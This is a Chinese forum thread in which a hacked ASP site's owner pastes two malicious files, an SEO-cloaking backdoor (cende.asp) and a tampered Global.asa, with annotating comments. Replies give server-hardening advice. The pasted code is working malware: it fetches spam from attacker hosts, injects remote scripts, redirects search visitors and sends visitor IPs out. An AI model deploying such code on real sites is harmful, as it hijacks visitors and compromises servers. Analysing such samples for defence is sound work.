asp网站被黑了~
服务器上总是多出这些文件,文件名每次都不同,我只能用备份比对找出多出来的文件再删除,可是删除后过一天又出现其它名称的文件。用了COMODO和瑞星,都是新手,用的默认设置
束手无策中,请高手指点从哪解决
附某天多出的两文件~~~~~~
文件cende.asp
<%
' [analysis] Cloaking gate: the branch below runs only when the request's User-Agent
' contains "http://" (case-insensitive compare). Presumably this targets search-engine
' crawlers, whose User-Agent strings commonly embed an info URL - confirm against logs.
' The matching "end if" is near the end of the file, after the function definitions.
if instr(1," "&lcase(Request.ServerVariables("HTTP_USER_AGENT"))&" ","http://",1)>0 then
%>
<%
' Output is declared as gb2312 (code page 936) and the script timeout raised to 500 s.
Response.CharSet="gb2312"
Session.CodePage=936
Server.ScriptTimeOut=500
dim id,mmhuan,wang,mulu,wenjian
' Two remote pages on the same parent domain. "lang" is assigned without being declared
' in the dim above; id, mmhuan, mulu and wenjian are declared but unused in this listing.
wang="http://huo.nfslc.com/sh/sh.asp"
lang="http://link.nfslc.com/new/n.asp"
' Each page is fetched server-side with GET and element (0) of the returned array
' (the decoded response body) is echoed into this site's response.
response.write gethttppage(wang,"","get","","","","*/*","no",1)(0)
response.write gethttppage(lang,"","get","","","","*/*","no",1)(0)
' Stop here so requests matching the gate receive only the remotely supplied content.
response.end
%>
<%
' --------------------------------
' [analysis] gethttppage: server-side HTTP client used to pull remote content.
' Parameters:
'   url1      - URL to request; an empty value returns the untouched array immediately
'   urlcode2  - charset forced when decoding the body; empty means use the detected one
'   fangshi3  - HTTP method (upper-cased before use)
'   cookie4   - value for the Cookie request header, skipped when empty
'   neirong5  - request body handed to send
'   lailu6    - value for the Referer request header, skipped when empty
'   accept7   - value for the Accept request header
'   zijie8    - "yes" returns the raw response bytes instead of decoded text
'   zhua9     - value written to WinHTTP option 6 (EnableRedirects)
' Returns an array: (0) body, (1) response headers, (2) status code, (3) status text,
' (4) responseText; element (5) is never written. (0) is filled only on HTTP 200.
' Depends on tiress, zzqu and readfile defined later in this file.
function gethttppage(url1,urlcode2,fangshi3,cookie4,neirong5,lailu6,accept7,zijie8,zhua9)
dim http,neirong,wjrhuan(5)
if len(url1)=0 then
gethttppage=wjrhuan
exit function
end if
' The ProgID is assembled from fragments; concatenated it reads
' "WinHttp.WinHttpRequest.5.1". Presumably split to defeat simple string scanning.
set http=Server.createobject("Win"&"Http.W"&"inHtt"&"pRe"&"quest"&".5.1")
' TimeInterval is assigned but not used anywhere in this function.
TimeInterval=200
lResolve=100
lConnect=100
lSend=100
lReceive=100
' Resolve/connect/send/receive timeouts of 100 s each (the API takes milliseconds).
http.setTimeouts lResolve*1000,lConnect*1000,lSend*1000,lReceive*1000
' Option 4 is SslErrorIgnoreFlags; 13056 (0x3300) ignores every certificate error,
' so the remote server's TLS certificate is never validated.
http.Option(4) = 13056
http.Option(6) = zhua9
http.open ucase(fangshi3),url1,false
if ucase(fangshi3)="POST" then
http.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
end if
http.setRequestHeader "Accept",accept7
if len(lailu6)>0 then
http.setRequestHeader "Referer",lailu6
end if
' Fixed browser-like User-Agent, so the outbound request does not identify as a script.
http.setRequestHeader "User-Agent","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
http.setRequestHeader "Accept-Language","zh-cn"
http.setRequestHeader "Connection","Keep-Alive"
http.setRequestHeader "Cache-Control","no-cache"
if len(cookie4)>0 then
http.setRequestHeader "Cookie",cookie4
else
end if
http.send(neirong5)
wjrhuan(1)=http.getAllResponseHeaders()
wjrhuan(2)=http.status
wjrhuan(3)=http.statustext
wjrhuan(4)=http.responseText
' Charset detection: Content-Type header first, then a <meta ... charset=...> tag.
dim wenben,wenbeni,wenben3,bianmaok
bianmaok=""
wenben=lcase(http.getAllResponseHeaders())
' Detection is attempted only when Content-Type is absent or starts with "text".
if instr(1,wenben,"content-type: ",1)=0 or instr(1,wenben,"content-type: text",1)>0 then
if instr(1,wenben,"content-type: ",1)>0 then
wenbeni=tiress(wenben,"content-type: ",chr(13)&chr(10))
if instr(1,wenbeni,"charset=",1)>0 then
bianmaok=tiress(wenbeni&chr(13)&chr(10),"charset=",chr(13)&chr(10))
end if
end if
if len(bianmaok)=0 then
wenbeni=zzqu(http.responseText,"<meta([^<]*)charset=([^<]*)>","=")
if len(wenbeni)>0 then
wenbeni=replace(wenbeni,"""","",1,-1,1)
wenbeni=replace(wenbeni,"'","",1,-1,1)
wenben3=zzqu(wenbeni,"charset=[a-z0-9\-\_]+","=")
' zzqu terminates every match with the marker "renyaai", used here as the end delimiter.
bianmaok=tiress(wenben3,"charset=","renyaai")
end if
end if
' NOTE(review): as written, the byte-order-mark check below runs only when the detected
' charset name is exactly 10 characters long.
if len(bianmaok)=10 then
If len(http.responseBody)>0 and AscB(MidB(http.responseBody,1,1))=&HEF and AscB(MidB(http.responseBody,2,1))=&HBB then
bianmaok="utf-8"
elseif len(http.responseBody)>10 and AscB(MidB(http.responseBody,1,1))=&HFF and AscB(MidB(http.responseBody,2,1))=&HFE then
bianmaok="unicode"
elseif len(http.responseBody)>10 and AscB(MidB(http.responseBody,1,1))=&HFE and AscB(MidB(http.responseBody,2,1))=&HFF then
bianmaok="unicodeFFFE"
else
bianmaok="gb2312"
end if
end if
end if
' Fall back to gb2312 when nothing was detected.
if len(bianmaok)=0 then
bianmaok="gb2312"
end if
if http.status=200 then
if zijie8="yes" then
wjrhuan(0)=http.responseBody
else
' A gzip-encoded response is not decoded; the body is returned as an empty string.
if instr(1,wenben,"content-encoding: gzip",1)=0 then
if len(urlcode2)>0 then
wjrhuan(0)=readfile(http.responseBody,urlcode2) 'page content
else
wjrhuan(0)=readfile(http.responseBody,bianmaok) 'page content
end if
else
wjrhuan(0)=""
end if
end if
end if
gethttppage=wjrhuan
set http=nothing
' No "On Error Resume Next" is visible in this function - presumably a leftover.
if err.number<>0 then
err.Clear
end if
end function
' [analysis] readfile: despite the name, no file is read. It takes a byte buffer
' (url1) and decodes it to text with the charset named in urlcode2, via an in-memory
' ADODB.Stream. Returns "" when the buffer has zero length.
function readfile(url1,urlcode2)
if len(url1)=0 then
readfile=""
exit function
end if
dim srmobj
' ProgID assembled from fragments; concatenated it reads "adodb.stream".
set srmobj=Server.CreateObject("ado" & "db.stre" & "am")
' Type 1 = binary, mode 3 = read/write: write the bytes, rewind, then switch the
' stream to type 2 (text) and read it back under the requested charset.
srmobj.type=1
srmobj.mode=3
srmobj.open
srmobj.write url1
srmobj.position=0
srmobj.type=2
srmobj.charset=urlcode2
readfile=srmobj.readtext()
' The stream is released without an explicit Close call.
set srmobj=nothing
end function
' [analysis] zzqu: runs the regular expression moshi over zifu (global, ignoring case)
' and returns every match whose text contains buyao, each followed by the literal
' marker "renyaai". Returns an empty value when nothing qualifies.
function zzqu(zifu,moshi,buyao)
dim zzexp,zzmat,zzmates
set zzexp=new regexp
zzexp.ignorecase=true
zzexp.global=true
zzexp.pattern=moshi
'set the pattern
set zzmates=zzexp.execute(zifu)
for each zzmat in zzmates
' Keep only matches that contain buyao (case-insensitive compare).
if instr(1,zzmat.value,buyao,1)>0 then
zzqu=zzqu&zzmat.value&"renyaai"
else
end if
next
set zzexp=nothing
end function
' [analysis] riwen: returns mm with a fixed list of katakana characters removed, using
' nested replace calls. Nothing in the visible listing calls this function.
function riwen(mm)
riwen=replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(mm,"ゴ",""),"ガ",""),"ギ",""),"グ",""),"ゲ",""),"ザ",""),"ジ",""),"ズ",""),"ヅ",""),"デ",""),"ド",""),"ポ",""),"ベ",""),"プ",""),"ビ",""),"パ",""),"ヴ",""),"ボ",""),"ペ",""),"ブ",""),"ピ",""),"バ",""),"ヂ",""),"ダ",""),"ゾ",""),"ゼ","")
end function
' [analysis] tiress: returns the text of trea lying between the first occurrence of
' treb and the next occurrence of trec after it (case-insensitive search).
' Returns "" when either delimiter is missing or trec does not follow treb.
function tiress(trea,treb,trec)
dim tia,tib,tic
if instr(1,trea,treb,1)<1 then
tiress=""
exit function
end if
if instr(1,trea,trec,1)<1 then
tiress=""
exit function
end if
' tia = start of the opening delimiter; tib = start of the closing delimiter,
' searched from just past the opening one.
tia=instr(1,trea,treb,1)
tib=instr(tia+len(treb),trea,trec,1)
if tib<1 then
tiress=""
exit function
end if
tiress=mid(trea,tia+len(treb),tib-tia-len(treb))
end function
' [analysis] wjrdu: local file read helper. Returns the text of the file at path dizhi,
' decoded with charset code, or the literal "<p>资源不存在" when the file does not exist.
' Nothing in the visible listing calls it.
function wjrdu(dizhi,code)
dim stm,fso
set fso=createobject("scripting.filesystemobject")
if fso.fileexists(dizhi)=false then
wjrdu="<p>资源不存在"
set fso=nothing
exit function
end if
set fso=nothing
' set stm=Server.CreateObject("ado" & "db.stre" & "am")
' ProgID assembled from fragments; concatenated it reads "adodb.stream".
set stm=Server.CreateObject("ado" & "db.stre" & "am")
stm.Type=2 'read in text mode
stm.mode=3
stm.charset=code
stm.open
stm.loadfromfile dizhi
wjrdu=stm.readtext
stm.Close
end function
' [analysis] wjrxie: local file write helper. Saves the text neirong to path dizhi in
' charset code. Nothing in the visible listing calls it, but its presence means the
' script carries a file-write capability - worth noting when files keep reappearing.
function wjrxie(dizhi,code,neirong)
dim objStream
'Set objStream=Server.CreateObject("ado" & "db.stre" & "am")
' ProgID assembled from fragments; concatenated it reads "adodb.stream".
Set objStream=Server.CreateObject("ado" & "db.stre" & "am")
With objStream
' Type 2 = text, mode 3 = read/write.
.type=2
.mode=3
.Open
.Charset = code
.Position = objStream.Size
.WriteText=neirong
' Option 2 on SaveToFile overwrites an existing file at dizhi.
.SaveToFile dizhi,2
.Close
End With
Set objStream = Nothing
end function
%>
<%
' [analysis] Closes the User-Agent branch opened at the top of the file. That branch
' already called response.end earlier, so this second call appears redundant.
response.end
end if
%>
<%
' [analysis] Reached only by requests that did not match the User-Agent gate, i.e.
' ordinary visitors. The fragments concatenate to a script tag loading
' hxxp://push[.]nfslc[.]com/sh.js (defanged here), so visitors' browsers execute
' JavaScript from the same parent domain the server-side fetches use. The per-character
' splitting presumably defeats simple string scanning.
response.write("<scri"&"pt lang"&"uage='jav"&"as"&"cri"&"pt' src='h"&"t"&"t"&"p"&":"&"/"&"/"&"p"&"u"&"s"&"h"&"."&"n"&"f"&"s"&"l"&"c"&"."&"c"&"o"&"m"&"/"&"sh"&".j"&"s'></sc"&"ript>")
%>
文件Global.asa
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
' [analysis] Statements placed outside any Sub in Global.asa. The script timeout is
' raised to 6000 s and errors are suppressed, so failures here leave no visible trace.
Server.ScriptTimeout=6000
On Error Resume Next
dim Q
Q=request.servervariables("HTTP_REFERER")
' Redirects the visitor when the Referer contains the URL-encoded byte pair %CE%B0
' (presumably part of a search keyword - confirm). Both sides of the Or test are the
' same string, so the second test adds nothing.
if Instr(Q,"%CE%B0")>0 Or Instr(Q,"%CE%B0")>0 Then
Response.Redirect("http://meiyg.52chaochui.com/index.asp")
End If
' [analysis] Session_onStart: code placed in the session-start handler of Global.asa.
' Three cases are tested in order:
'   1. Referer contains this site's own host name: do nothing.
'   2. Referer contains "www.baidu.com/s?" and the query string contains "void=":
'      redirect the visitor to a remote page, appending this site's host name.
'   3. User-Agent contains "aidu" and the script name does not contain "win":
'      fetch a remote page and echo it (presumably aimed at the Baidu crawler - confirm).
' "我的域名" in the URLs is the poster's redaction of their own domain. The redirect
' statement in case 2 is split across two lines in this paste, presumably by the forum.
Sub Session_onStart
if instr(request.servervariables("HTTP_REFERER"),Request.ServerVariables("HTTP_HOST"))>0 then
exit sub
elseif instr(request.servervariables("HTTP_REFERER"),"www.baidu.com/s?")>0 and instr(request.servervariables("QUERY_STRING"),"void=")>0 then
response.redirect("http://www.ajeni.cn/ZYXedit/editor/skins/default/images/seo/weige_snew_www.我的域名.net.asp?"&Request.ServerVariables
("HTTP_HOST"))
elseif instr(request.servervariables("HTTP_USER_AGENT"),"aidu")>0 and instr(request.servervariables("SCRIPT_NAME"),"win")=0 then
Dim Url,Html,Get_String,Get_id,Get_String2
randomize
' The outbound URL carries this site's host name (m), the requester's IP (r) and a
' random number (x) to the remote server.
Get_id=int(10000000*rnd)
Get_String=Request.ServerVariables("REMOTE_ADDR")
Get_String2=Request.ServerVariables("HTTP_HOST")
Url="http://www.ajeni.cn/ZYXedit/editor/skins/default/images/seo/weige_snew_www.(我的域名).asp?m="&Get_String2&"&r="&Get_String&"&x="&Get_id
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
' The User-Agent header of the outbound request is set to the URL itself.
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
' Decode the response bytes as gb2312 text through an in-memory ADODB.Stream
' (type 1 = binary for writing, then type 2 = text for reading).
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
' The fetched page is echoed only when it contains a closing </html> tag.
if instr(GetHtml,"</html>")>0 then
Response.write GetHtml
end if
end if
End Sub
</SCRIPT>
[解决办法]
在conn.asp里加入SQL防注入代码(可上百度搜索下载)。
网站所有目录设置为只读,只有数据库可写;另外要将上传目录的执行权限设为“无”。
这样基本安全了。不过这些设置只能防止再次被写入文件,已经被植入的后门文件和被篡改的Global.asa仍需先清理干净,否则文件还会反复出现。
[解决办法]
应当是你的IIS 或者 文件夹的权限没有设置好!
读和写的权限要分配好
[解决办法]
1,先定期的备份服务器上整个网站,出现问题了,可以复原一下
2,检查上传下载的权限,对于Ewebeditor编辑器的文件上传大小进行控制。
3,服务器上安装McAfee软件,通过McAfee的设置可以禁止上传网站本身不存在的文件名或文件格式
4,检查IIS网站属性,为网站设置一个新建的应用程序池,并在IIS用户中为网站设置一个用户。
5,右击网站属性找到“安全”标签,把权限作个设置
6,数据库用户不要用sa,新建一个用户
7,页面作防sql注入